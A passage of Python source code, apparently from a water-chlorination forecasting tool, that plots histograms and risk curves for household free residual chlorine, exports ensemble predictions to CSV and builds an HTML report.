elif WATTEMP in self.datainputs.columns:
hist_fig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(
6, 1, figsize=(3.35, 6.69), dpi=300
)
ax1.set_ylabel("Frequency")
ax1.set_xlabel("Tapstand FRC (mg/L)")
ax1.hist(self.datainputs.iloc[:, 0], bins=30, color="grey")
ax2.set_ylabel("Frequency")
ax2.set_xlabel("Elapsed Time (hours)")
ax2.hist(self.datainputs.iloc[:, 1], bins=30, color="grey")
ax3.set_ylabel("Frequency")
ax3.set_xlabel("Collection Time (0=AM, 1=PM)")
ax3.hist(self.datainputs.iloc[:, 2], bins=30, color="grey")
ax4.set_ylabel("Frequency")
ax4.set_xlabel("Water Temperature(" + r"$\degree$" + "C)")
ax4.hist(self.datainputs.iloc[:, 3], bins=30, color="grey")
ax4.axvline(
self.median_wattemp,
c="#ffa600",
ls="--",
label="Average Case Value Used",
)
ax4.axvline(
self.upper95_wattemp,
c="#b80000",
ls="--",
label="Worst Case Value Used",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
ax5.set_ylabel("Frequency")
ax5.set_xlabel("Household FRC (mg/L)")
ax5.hist(self.dataoutputs, bins=30, color="grey")
plt.subplots_adjust(
left=0.18, hspace=0.60, top=0.99, bottom=0.075, right=0.98
)
plt.savefig(
os.path.splitext(filename)[0] + "_Histograms_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig3.pickle', 'wb'))
plt.close()
StringIOBytes_histogram = io.BytesIO()
plt.savefig(StringIOBytes_histogram, format="png", bbox_inches="tight")
StringIOBytes_histogram.seek(0)
hist_base_64_pngData = base64.b64encode(StringIOBytes_histogram.read())
elif COND in self.datainputs.columns:
hist_fig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(
6, 1, figsize=(3.35, 6.69), dpi=300
)
ax1.set_ylabel("Frequency")
ax1.set_xlabel("Tapstand FRC (mg/L)")
ax1.hist(self.datainputs.iloc[:, 0], bins=30, color="grey")
ax2.set_ylabel("Frequency")
ax2.set_xlabel("Elapsed Time (hours)")
ax2.hist(self.datainputs.iloc[:, 1], bins=30, color="grey")
ax3.set_ylabel("Frequency")
ax3.set_xlabel("Collection Time (0=AM, 1=PM)")
ax3.hist(self.datainputs.iloc[:, 2], bins=30, color="grey")
ax4.set_ylabel("Frequency")
ax4.set_xlabel("Electrical Conductivity (" + r"$\mu$" + "s/cm)")
ax4.hist(self.datainputs.iloc[:, 4], bins=30, color="grey")
ax4.axvline(
self.median_cond,
c="#ffa600",
ls="--",
label="Average Case Value Used",
)
ax4.axvline(
self.upper95_cond,
c="#b80000",
ls="--",
label="Worst Case Value used",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
ax5.set_ylabel("Frequency")
ax5.set_xlabel("Household FRC (mg/L)")
ax5.hist(self.dataoutputs, bins=30, color="grey")
plt.subplots_adjust(
left=0.18, hspace=0.60, top=0.99, bottom=0.075, right=0.98
)
plt.savefig(
os.path.splitext(filename)[0] + "_Histograms_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig3.pickle', 'wb'))
plt.close()
StringIOBytes_histogram = io.BytesIO()
plt.savefig(StringIOBytes_histogram, format="png", bbox_inches="tight")
StringIOBytes_histogram.seek(0)
hist_base_64_pngData = base64.b64encode(StringIOBytes_histogram.read())
else:
if self.post_process_check == False:
results_table_frc_avg_am = self.avg_case_results_am.iloc[
:, 0 : (self.network_count - 1)
]
results_table_frc_avg_pm = self.avg_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
]
preds_fig, (ax1, ax2) = plt.subplots(
1, 2, figsize=(6.69, 3.35), dpi=300
)
ax1.fill_between(
test1_frc,
np.percentile(results_table_frc_avg_am, 97.5, axis=1),
np.percentile(results_table_frc_avg_am, 2.5, axis=1),
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax1.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax1.plot(
test1_frc,
np.min(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax1.plot(
test1_frc,
np.max(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=0.5,
)
ax1.plot(
test1_frc,
np.median(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax1.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax1.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax1.set_xlim([0.19, 2.0])
ax1.set_xticks(np.arange(0.2, 2.2, 0.2))
ax1.set_xlabel("Tap Stand FRC (mg/L)")
ax1.set_ylabel("Household FRC (mg/L)")
ax1.set_title("AM Collection")
ax2.fill_between(
test1_frc,
np.percentile(results_table_frc_avg_pm, 97.5, axis=1),
np.percentile(results_table_frc_avg_pm, 2.5, axis=1),
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax2.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax2.plot(
test1_frc,
np.min(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax2.plot(
test1_frc,
np.max(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=0.5,
)
ax2.plot(
test1_frc,
np.median(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax2.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax2.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax2.set_xlim([0.19, 2.0])
ax2.set_xticks(np.arange(0.2, 2.2, 0.2))
ax2.set_xlabel("Tap Stand FRC (mg/L)")
ax2.set_ylabel("Household FRC (mg/L)")
ax2.set_title("PM Collection")
plt.subplots_adjust(wspace=0.25)
plt.savefig(
os.path.splitext(filename)[0] + "_Predictions_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig1.pickle', 'wb'))
StringIOBytes_preds = io.BytesIO()
plt.savefig(StringIOBytes_preds, format="png", bbox_inches="tight")
StringIOBytes_preds.seek(0)
preds_base_64_pngData = base64.b64encode(StringIOBytes_preds.read())
plt.close()
risk_fig = plt.figure(figsize=(6.69, 3.35), dpi=300)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_avg_am, 0.20), axis=1)
/ self.network_count,
c="#ffa600",
label="Risk of Household FRC < 0.20 mg/L - Average Case, AM Collection",
)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_avg_pm, 0.20), axis=1)
/ self.network_count,
c="#ffa600",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Average Case, PM Collection",
)
plt.xlim([0.2, 2])
plt.xlabel("Tapstand FRC (mg/L)")
plt.ylim([0, 1])
plt.ylabel("Risk of Point-of-Consumption FRC < 0.2 mg/L")
plt.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
plt.subplots_adjust(bottom=0.15, right=0.95)
plt.savefig(
os.path.splitext(filename)[0] + "_Risk_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig2.pickle', 'wb'))
StringIOBytes_risk = io.BytesIO()
plt.savefig(StringIOBytes_risk, format="png", bbox_inches="tight")
StringIOBytes_risk.seek(0)
risk_base_64_pngData = base64.b64encode(StringIOBytes_risk.read())
plt.close()
elif self.post_process_check == True:
preds_fig, (ax1, ax2) = plt.subplots(
1, 2, figsize=(6.69, 3.35), dpi=300
)
ax1.fill_between(
test1_frc,
self.avg_case_results_am_post["Upper 95 CI"],
self.avg_case_results_am_post["Lower 95 CI"],
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax1.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax1.plot(
test1_frc,
self.avg_case_results_am_post["Ensemble Minimum"],
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax1.plot(
test1_frc,
self.avg_case_results_am_post["Ensemble Maximum"],
"#ffa600",
linewidth=0.5,
)
ax1.plot(
test1_frc,
self.avg_case_results_am_post["median"],
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax1.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax1.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax1.set_xlim([0.19, 2.0])
ax1.set_xticks(np.arange(0.2, 2.2, 0.2))
ax1.set_xlabel("Tap Stand FRC (mg/L)")
ax1.set_ylabel("Household FRC (mg/L)")
ax1.set_title("AM Collection")
ax2.fill_between(
test1_frc,
self.avg_case_results_pm_post["Upper 95 CI"],
self.avg_case_results_pm_post["Lower 95 CI"],
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax2.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["Ensemble Minimum"],
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["Ensemble Maximum"],
"#ffa600",
linewidth=0.5,
)
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["median"],
"#ffa600",
linewidth=1,
label="median Prediction",
)
ax2.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax2.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax2.set_xlim([0.19, 2.0])
ax2.set_xticks(np.arange(0.2, 2.2, 0.2))
ax2.set_xlabel("Tap Stand FRC (mg/L)")
ax2.set_ylabel("Household FRC (mg/L)")
ax2.set_title("PM Collection")
plt.subplots_adjust(wspace=0.25)
plt.tight_layout()
plt.savefig(
os.path.splitext(filename)[0] + "_Predictions_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig1.pickle', 'wb'))
StringIOBytes_preds = io.BytesIO()
plt.savefig(StringIOBytes_preds, format="png", bbox_inches="tight")
StringIOBytes_preds.seek(0)
preds_base_64_pngData = base64.b64encode(StringIOBytes_preds.read())
plt.close()
risk_fig = plt.figure(figsize=(6.69, 3.35), dpi=300)
plt.plot(
test1_frc,
self.avg_case_results_am_post["probability<=0.20"],
c="#ffa600",
label="Risk of Household FRC < 0.20 mg/L - Average Case, AM Collection",
)
plt.plot(
test1_frc,
self.avg_case_results_pm_post["probability<=0.20"],
c="#ffa600",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Average Case, PM Collection",
)
plt.xlim([0.2, 2])
plt.xlabel("Tapstand FRC (mg/L)")
plt.ylim([0, 1])
plt.ylabel("Risk of Point-of-Consumption FRC < 0.2 mg/L")
plt.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
plt.savefig(
os.path.splitext(filename)[0] + "_Risk_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig2.pickle', 'wb'))
StringIOBytes_risk = io.BytesIO()
plt.savefig(StringIOBytes_risk, format="png", bbox_inches="tight")
StringIOBytes_risk.seek(0)
risk_base_64_pngData = base64.b64encode(StringIOBytes_risk.read())
plt.close()
hist_fig, (ax1, ax2, ax3, ax4) = plt.subplots(
4, 1, figsize=(3.35, 6.69), dpi=300
)
ax1.set_ylabel("Frequency")
ax1.set_xlabel("Tapstand FRC (mg/L)")
ax1.hist(self.datainputs.iloc[:, 0], bins=30, color="grey")
ax2.set_ylabel("Frequency")
ax2.set_xlabel("Elapsed Time (hours)")
ax2.hist(self.datainputs.iloc[:, 1], bins=30, color="grey")
ax3.set_ylabel("Frequency")
ax3.set_xlabel("Collection Time (0=AM, 1=PM)")
ax3.hist(self.datainputs.iloc[:, 2], bins=30, color="grey")
ax4.set_ylabel("Frequency")
ax4.set_xlabel("Household FRC (mg/L)")
ax4.hist(self.dataoutputs, bins=30, color="grey")
plt.subplots_adjust(
left=0.18, hspace=0.60, top=0.99, bottom=0.075, right=0.98
)
plt.savefig(
os.path.splitext(filename)[0] + "_Histograms_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig3.pickle', 'wb'))
plt.close()
StringIOBytes_histogram = io.BytesIO()
plt.savefig(StringIOBytes_histogram, format="png", bbox_inches="tight")
StringIOBytes_histogram.seek(0)
hist_base_64_pngData = base64.b64encode(StringIOBytes_histogram.read())
return hist_base_64_pngData, risk_base_64_pngData, preds_base_64_pngData
def display_results(self):
"""
Display the results of the predictions as a console output.
Display and return all the contents of the self.results variable which is a pandas Dataframe object
:return: A Pandas Dataframe object (self.results) containing all the result of the predictions
"""
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
if self.post_process_check == False:
logging.info(self.avg_case_results_am)
logging.info(self.worst_case_results_am)
logging.info(self.avg_case_results_pm)
logging.info(self.worst_case_results_pm)
return self.avg_case_results_am, self.avg_case_results_pm, self.worst_case_results_am, self.worst_case_results_pm
else:
logging.info(self.avg_case_results_am_post)
logging.info(self.worst_case_results_am_post)
logging.info(self.avg_case_results_pm_post)
logging.info(self.worst_case_results_pm_post)
return self.avg_case_results_am_post, self.avg_case_results_pm_post, self.worst_case_results_am_post, self.worst_case_results_pm_post
else:
if self.post_process_check == False:
logging.info(self.avg_case_results_am)
logging.info(self.avg_case_results_pm)
return self.avg_case_results_am, self.avg_case_results_pm
else:
logging.info(self.avg_case_results_am_post)
logging.info(self.avg_case_results_pm_post)
return self.avg_case_results_am_post, self.avg_case_results_pm_post
def export_results_to_csv(self, filename):
self.avg_case_results_am.to_csv(
os.path.splitext(filename)[0] + "_average_case_am.csv", index=False
)
self.avg_case_results_pm.to_csv(
os.path.splitext(filename)[0] + "_average_case_pm.csv", index=False
)
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
self.worst_case_results_am.to_csv(
os.path.splitext(filename)[0] + "_worst_case_am.csv", index=False
)
self.worst_case_results_pm.to_csv(
os.path.splitext(filename)[0] + "_worst_case_pm.csv", index=False
)
if self.post_process_check == True:
self.avg_case_results_am_post.to_csv(
os.path.splitext(filename)[0] + "_average_case_am.csv", index=False
)
self.avg_case_results_pm_post.to_csv(
os.path.splitext(filename)[0] + "_average_case_pm.csv", index=False
)
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
self.worst_case_results_am_post.to_csv(
os.path.splitext(filename)[0] + "_worst_case_am.csv", index=False
)
self.worst_case_results_pm_post.to_csv(
os.path.splitext(filename)[0] + "_worst_case_pm.csv", index=False
)
def generate_model_performance(self):
"""Generates training performance graphs
Plots the model performance metrics (MSE and R^2 vs # of epochs) after training and returns a
base64 encoded image. The NN has to be trained first otherwise the image will be empty.
Returns: Base64 data stream"""
fig, axs = plt.subplots(1, 2, sharex=True)
ax = axs[0]
ax.boxplot(
[self.total_mse_train, self.total_mse_val, self.total_mse_test],
labels=["Training", "Validation", "Testing"],
)
ax.set_title("Mean Squared Error")
tr_legend = "Training Avg MSE: {mse:.4f}".format(mse=self.avg_mse_train)
val_legend = "Validation Avg MSE: {mse:.4f}".format(mse=self.avg_mse_val)
ts_legend = "Testing Avg MSE: {mse:.4f}".format(mse=self.avg_mse_test)
ax.legend([tr_legend, val_legend, ts_legend])
ax = axs[1]
ax.boxplot(
[
self.total_rsquared_train,
self.total_rsquared_val,
self.total_rsquared_test,
],
labels=["Training", "Validation", "Testing"],
)
ax.set_title("R^2")
tr_legend = "Training Avg. R^2: {rs:.3f}".format(rs=self.avg_rsq_train)
val_legend = "Validation Avg. R^2: {rs:.3f}".format(rs=self.avg_rsq_val)
ts_legend = "Validation Avg. R^2: {rs:.3f}".format(rs=self.avg_rsq_test)
ax.legend([tr_legend, val_legend, ts_legend])
fig.suptitle(
"Performance metrics across 100 training runs on "
+ str(self.epochs)
+ " epochs, with "
+ str(self.layer1_neurons)
+ " neurons on hidden layer."
)
fig.set_size_inches(12, 8)
# plt.show()
# Uncomment the next lines to save the graph to disk
# plt.savefig("model_metrics\\" + str(self.epochs) + "_epochs_" + str(self.layer1_neurons) + "_neurons.png",
# dpi=100)
# plt.close()
plt.show()
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format='png')
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def generate_2d_scatterplot(self):
"""Generate a 2d scatterplot of the predictions
Plots three, 2-dimensional scatterplots of the predictions as a function of the inputs
The 3 scatterplots are plotting: predictions vs se1_frc and water temperature, predictions
vs water conductivity and water temperature, and predictions vs se1_frc and water conductivity.
A histogram of the prediction set is also generated and plotted. A prediction using the
predict() method must be made first.
Returns: a base64 data represenation of the image."""
df = self.results
# Uncomment the following line to load the results direclty from an csv file
# df = pd.read_csv('results.csv')
# Filter out outlier values
df = df.drop(df[df[FRC_IN] > 2.8].index)
frc = df[FRC_IN]
watt = df[WATTEMP]
cond = df[COND]
c = df["median"]
# sort data for the cdf
sorted_data = np.sort(c)
# The following lines of code calculate the width of the histogram bars
# and align the range of the histogram and the pdf
if min(c) < 0:
lo_limit = 0
else:
lo_limit = round(min(c), 2)
logging.info(lo_limit)
if max(c) <= 0.75:
divisions = 16
hi_limit = 0.75
elif max(c) < 1:
divisions = 21
hi_limit = 1
elif max(c) <= 1.5:
divisions = 31
hi_limit = 1.5
elif max(c) <= 2:
divisions = 41
hi_limit = 2
divisions = round((hi_limit - lo_limit) / 0.05, 0) + 1
logging.info(divisions)
# Get the data between the limits
sorted_data = sorted_data[sorted_data > lo_limit]
sorted_data = sorted_data[sorted_data < hi_limit]
# create a colorbar for the se4_frc and divide it in 0.2 mg/L intervals
cmap = plt.cm.jet_r
cmaplist = [cmap(i) for i in range(cmap.N)]
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"Custom cmap", cmaplist, cmap.N
)
bounds = np.linspace(0, 1.4, 8)
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
fig = plt.figure(figsize=(19.2, 10.8), dpi=100)
ax = fig.add_subplot(221)
img = ax.scatter(frc, watt, c=c, s=5, cmap=cmap, norm=norm, alpha=1)
ax.set_xlabel("FRC at tapstand (mg/L)")
ax.set_ylabel("Water Temperature (" + "\u00b0" + "C)")
ax.grid(linewidth=0.2)
ax = fig.add_subplot(222)
img = ax.scatter(frc, cond, c=c, s=5, cmap=cmap, norm=norm, alpha=1)
ax.set_xlabel("FRC at tapstand (mg/L)")
ax.set_ylabel("Water Conductivity (\u03BCS/cm)")
ax.grid(linewidth=0.2)
ax = fig.add_subplot(223)
img = ax.scatter(watt, cond, c=c, s=5, cmap=cmap, norm=norm, alpha=1)
ax.set_xlabel("Water Temperature (" + "\u00b0" + "C)")
ax.set_ylabel("Water Conductivity (\u03BCS/cm)")
ax.grid(linewidth=0.2)
ax = fig.add_subplot(224)
img = ax.hist(
c,
bins=np.linspace(lo_limit, hi_limit, divisions),
edgecolor="black",
linewidth=0.1,
)
ax.grid(linewidth=0.1)
line02 = ax.axvline(0.2, color="r", linestyle="dashed", linewidth=2)
line03 = ax.axvline(0.3, color="y", linestyle="dashed", linewidth=2)
ax.set_xlabel("FRC at household (mg/L)")
ax.set_ylabel("# of instances")
axcdf = ax.twinx()
(cdf,) = axcdf.step(sorted_data, np.arange(sorted_data.size), color="g")
ax.legend(
(line02, line03, cdf), ("0.2 mg/L", "0.3 mg/L", "CDF"), loc="center right"
)
ax2 = fig.add_axes([0.93, 0.1, 0.01, 0.75])
cb = mpl.colorbar.ColorbarBase(
ax2,
cmap=cmap,
norm=norm,
spacing="proportional",
ticks=bounds,
boundaries=bounds,
)
cb.ax.set_ylabel("FRC at se4 (mg/L)", rotation=270, labelpad=20)
plt.show()
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format="png")
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def generate_input_info_plots(self, filename):
"""Generates histograms of the inputs to the ANN
Plots one histogram for each input field on the neural network
along with the mean and median values."""
df = self.datainputs
# df = df.drop(df[df["se1_frc"] > 2.8].index)
frc = df[FRC_IN]
watt = df[WATTEMP]
cond = df[COND]
dfo = self.file
dfo = dfo.drop(dfo[dfo[FRC_IN] > 2.8].index)
frc4 = dfo[FRC_OUT]
fig = plt.figure(figsize=(19.2, 10.8), dpi=100)
# fig.suptitle('Total samples: '+ str(len(frc))) # +
# "\n" + "SWOT version: " + self.software_version +
# "\n" + "Input Filename: " + os.path.basename(self.input_filename) +
# "\n" + "Generated on: " + self.today)
axInitialFRC = fig.add_subplot(221)
axInitialFRC.hist(frc, bins=20, edgecolor="black", linewidth=0.1)
axInitialFRC.set_xlabel("Initial FRC (mg/L)")
axInitialFRC.set_ylabel("# of instances")
mean = round(np.mean(frc), 2)
median = np.median(frc)
mean_line = axInitialFRC.axvline(
mean, color="r", linestyle="dashed", linewidth=2
)
median_line = axInitialFRC.axvline(
median, color="y", linestyle="dashed", linewidth=2
)
axInitialFRC.legend(
(mean_line, median_line),
("Mean: " + str(mean) + " mg/L", "Median: " + str(median) + " mg/L"),
)
ax = fig.add_subplot(222)
ax.hist(watt, bins=20, edgecolor="black", linewidth=0.1)
ax.set_xlabel("Water Temperature (" + "\u00b0" + "C)")
ax.set_ylabel("# of instances")
mean = round(np.mean(watt), 2)
median = np.median(watt)
mean_line = ax.axvline(mean, color="r", linestyle="dashed", linewidth=2)
median_line = ax.axvline(median, color="y", linestyle="dashed", linewidth=2)
ax.legend(
(mean_line, median_line),
(
"Mean: " + str(mean) + "\u00b0" + "C",
"Median: " + str(median) + "\u00b0" + "C",
),
)
ax = fig.add_subplot(223)
ax.hist(cond, bins=20, edgecolor="black", linewidth=0.1)
ax.set_xlabel("Water Conductivity (\u03BCS/cm)")
ax.set_ylabel("# of instances")
mean = round(np.mean(cond), 2)
median = np.median(cond)
mean_line = ax.axvline(mean, color="r", linestyle="dashed", linewidth=2)
median_line = ax.axvline(median, color="y", linestyle="dashed", linewidth=2)
ax.legend(
(mean_line, median_line),
(
"Mean: " + str(mean) + " \u03BCS/cm",
"Median: " + str(median) + " \u03BCS/cm",
),
)
axHouseholdFRC = fig.add_subplot(224)
axHouseholdFRC.hist(
frc4, bins=np.linspace(0, 2, 41), edgecolor="black", linewidth=0.1
)
axHouseholdFRC.set_xlabel("Household FRC (\u03BCS/cm)")
axHouseholdFRC.set_ylabel("# of instances")
mean = round(np.mean(frc4), 2)
median = np.median(frc4)
mean_line = axHouseholdFRC.axvline(
mean, color="r", linestyle="dashed", linewidth=2
)
median_line = axHouseholdFRC.axvline(
median, color="y", linestyle="dashed", linewidth=2
)
axHouseholdFRC.legend(
(mean_line, median_line),
(
"Mean: " + str(mean) + " \u03BCS/cm",
"Median: " + str(median) + " \u03BCS/cm",
),
)
fig.savefig(os.path.splitext(filename)[0] + ".png", format="png")
# plt.show()
# create figure for initial and household FRC separately in a single image
figFRC = plt.figure(figsize=(19.2 / 1.45, 6.4), dpi=100)
axInitialFRC = figFRC.add_subplot(211)
axInitialFRC.hist(frc, bins=20, edgecolor="black", linewidth=0.1)
axInitialFRC.set_xlabel("Initial FRC (mg/L)")
axInitialFRC.set_ylabel("# of instances")
mean = round(np.mean(frc), 2)
median = np.median(frc)
mean_line = axInitialFRC.axvline(
mean, color="r", linestyle="dashed", linewidth=2
)
median_line = axInitialFRC.axvline(
median, color="y", linestyle="dashed", linewidth=2
)
axInitialFRC.legend(
(mean_line, median_line),
("Mean: " + str(mean) + " mg/L", "Median: " + str(median) + " mg/L"),
)
axHouseholdFRC = figFRC.add_subplot(212)
axHouseholdFRC.hist(
frc4, bins=np.linspace(0, 2, 41), edgecolor="black", linewidth=0.1
)
axHouseholdFRC.set_xlabel("Household FRC (mg/L)")
axHouseholdFRC.set_ylabel("# of instances")
mean = round(np.mean(frc4), 2)
median = np.median(frc4)
mean_line = axHouseholdFRC.axvline(
mean, color="r", linestyle="dashed", linewidth=2
)
median_line = axHouseholdFRC.axvline(
median, color="y", linestyle="dashed", linewidth=2
)
axHouseholdFRC.legend(
(mean_line, median_line),
("Mean: " + str(mean) + " mg/L", "Median: " + str(median) + " mg/L"),
)
figFRC.savefig(os.path.splitext(filename)[0] + "-frc.jpg", format="jpg")
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format="png")
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def generate_html_report(self, filename, storage_target):
"""Generates an html report of the SWOT results. The report
is saved on disk under the name 'filename'."""
df = self.datainputs
frc = df[FRC_IN]
# self.generate_input_info_plots(filename).decode('UTF-8')
hist, risk, pred = self.results_visualization(filename, storage_target)
hist.decode("UTF-8")
risk.decode("UTF-8")
pred.decode("UTF-8")
# scatterplots_b64 = self.generate_2d_scatterplot().decode('UTF-8')
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
avg_html_table, worst_html_table = self.prepare_table_for_html_report(
storage_target
)
else:
avg_html_table = self.prepare_table_for_html_report(storage_target)
skipped_rows_table = self.skipped_rows_html()
doc, tag, text, line = Doc().ttl()
with tag("h1", klass="title"):
text("SWOT ARTIFICIAL NEURAL NETWORK REPORT")
with tag("p", klass="swot_version"):
text("SWOT ANN Code Version: " + self.software_version)
with tag("p", klass="input_filename"):
text("Input File Name: " + os.path.basename(self.input_filename))
with tag("p", klass="date"):
text("Date Generated: " + self.today)
with tag("p", klass="time_difference"):
text(
"Average time between tapstand and household: "
+ str(int(self.avg_time_elapsed // 3600))
+ " hours and "
+ str(int((self.avg_time_elapsed // 60) % 60))
+ " minutes"
)
with tag("p"):
text("Total Samples: " + str(len(frc)))
if self.post_process_check == False:
with tag("h2", klass="Header"):
text("Predicted Risk - Raw Ensemble:")
else:
with tag("h2", klass="Header"):
text("Predicted Risk - Post-Processed Ensemble:")
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
with tag("p", klass="Predictions Fig Text"):
text(
"Household FRC forecast from an ensemble of "
+ str(self.network_count)
+ " ANN models. The predictions of each model are grouped into a probability density function to predict the risk of FRC below threshold values of 0.20 mg/L using a fixed input variable set for worst case and average case scenarios (shown in the risk tables below). Note that if FRC is collected using pool testers instead of a cholorimeter, the predicted FRC may be disproportionately clustered towards the centre of the observations, resulting in some observations with low FRC to not be captured within the ensemble forecast. In these cases, the predicted risk in the next figure and in the subsequent risk tables may be underpredicted. Average case predictions use median collected values for conductivity and water temperature; worst-case scenario uses 95th percentile values for conductivity and water temeperature"
)
with tag("div", id="Predictions Graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Predictions_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Predictions_Fig.png"
# )
# + '" type="image/jpeg"></object>'
# )
with tag("p", klass="Risk Fig Text"):
text(
"Figure and tables showing predicted risk of household FRC below 0.2 mg/L for average and worst case scenarios for both AM and PM collection. Risk obtained from forecast pdf (above) and taken as cumulative probability of houeshold FRC below 0.2 mg/L. Note that 0% predicted risk of household FRC below 0.2 mg/L does not mean that there is no possibility of household FRC being below 0.2 mg/L, simply that the predicted risk is too low to be measured. The average case target may, in some, cases be more conservative than the worst case targets as the worst case target is derived on the assumption that higher conductivity and water temperature will lead to greater decay (as confirmed by FRC decay chemisty and results at past sites). However, this may not be true in all cases, so the most conservative target is always recommended."
)
with tag("div", id="Risk Graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Risk_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(os.path.splitext(filename)[0] + "_Risk_Fig.png")
# + '" type="image/jpeg"></object>'
# )
with tag("h2", klass="Header"):
text("Average Case Targets Table")
with tag("table", id="average case table"):
doc.asis(avg_html_table)
with tag("h2", klass="Header"):
text("Worst Case Targets Table")
with tag("table", id="worst case table"):
doc.asis(worst_html_table)
with tag("p", klass="Histograms Text"):
text(
"Histograms for the input variables used to generate predictions and risk recommendations above. Average case and worst case conductivity and water temperature are shown for context of values used to generate targets."
)
with tag("div", id="Histograms"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Histograms_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Histograms_Fig.png"
# )
# + '" type="image/jpeg"></object>'
# )
else:
with tag("p", klass="Predictions Fig Text"):
text(
"Household FRC forecast from an ensemble of "
+ str(self.network_count)
